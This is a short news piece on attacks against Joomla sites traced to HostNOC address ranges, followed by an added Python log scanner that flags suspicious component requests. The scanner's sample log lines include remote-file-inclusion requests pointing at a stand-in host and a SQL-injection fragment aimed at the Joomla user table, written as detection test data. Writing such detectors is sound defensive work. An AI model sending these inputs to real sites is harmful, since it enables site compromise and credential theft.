HostNOC sourcing attacks against Joomla

“We are seeing increased criminal activity from HostNOC (aka Burst.net)” reports Stop Malvertising (With Love from HostNOC). “Recently suspicious scans from HostNOC ranges targeting Joomla components started filling up the server logs. Some of the hack attempts also tried to load remote scripts.”

“The first time I ran into HostNOC,” says Mikko Hypponen, “was back in 2007 when a DDoS attack against F-Secure.com was launched from their IP space. Now we regularly see badness from the same space: botnet C&C servers, DNS changers, ZeuS servers and so on. There's probably some good stuff in their network too – I just haven't found it.”

This current campaign “looks like attacks against websites running Joomla CMS,” explains Fraser Howard, a principal researcher at SophosLabs. “There have been a lot of user reports of these attacks in recent days.” The attacks are fairly typical: malicious HTTP requests against CMS applications. “From the looks of things,” he added, “they are targeting one of the default Joomla database tables containing user information.”

One potential abuse of stolen user credentials, and of the unauthorized access they enable, is to add malicious redirects to affected websites; that is, to redirect visitors to exploit sites. However, correctly configured firewalls should stop most of these malicious scans.
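For site owners reviewing their own server logs for the activity described above, the following is an added example (not from the article or the researchers quoted) that flags Joomla component requests whose parameters carry a remote URL or reference the user table. It assumes combined-format access logs and that the table in question is `jos_users` under the default prefix of older Joomla releases, which the article does not name; the component name `com_example`, the IPs and the log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote

# Assumption: Apache/nginx "combined" access-log lines.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (?P<target>\S+)[^"]*" \d{3}')
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.I)  # parameter value is a remote URL
# Assumption: jos_users is the user table under older Joomla's default prefix;
# the article does not name the table.
USERS_RE = re.compile(r"\bjos_users\b", re.I)

def classify(line):
    """Return (ip, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _, _, query = m.group("target").partition("?")
    params = parse_qsl(query, keep_blank_values=True)  # decodes %xx and '+' once
    if not any(k == "option" and v.startswith("com_") for k, v in params):
        return m.group("ip"), set()  # not a Joomla component request
    findings = set()
    for _, value in params:
        value = unquote(value)  # second decode catches double-encoded values
        if REMOTE_RE.match(value):
            findings.add("remote-script-load")
        if USERS_RE.search(value):
            findings.add("users-table-reference")
    return m.group("ip"), findings

def scan(lines):
    """Map each source IP to the union of findings across its requests."""
    hits = defaultdict(set)
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            hits[parsed[0]] |= parsed[1]
    return dict(hits)

# Constructed sample lines (documentation IP ranges, made-up component name).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /index.php?option=com_example&controller=http://files.example.net/r.txt? HTTP/1.1" 404 512',
    '198.51.100.7 - - [01/Jan/2000:10:00:05 +0000] "GET /index.php?option=com_example&id=1+FROM+jos_users HTTP/1.1" 200 1024',
    '203.0.113.5 - - [01/Jan/2000:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2000:10:00:12 +0000] "GET /index.php?option=com_example&file=%2568ttp%253A%252F%252Ffiles.example.net%252Fr.txt HTTP/1.1" 404 512',
]

if __name__ == "__main__":
    for ip, found in sorted(scan(SAMPLE).items()):
        print(ip, sorted(found))
```

Source IPs that this flags repeatedly are candidates for the firewall rules mentioned above.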
 
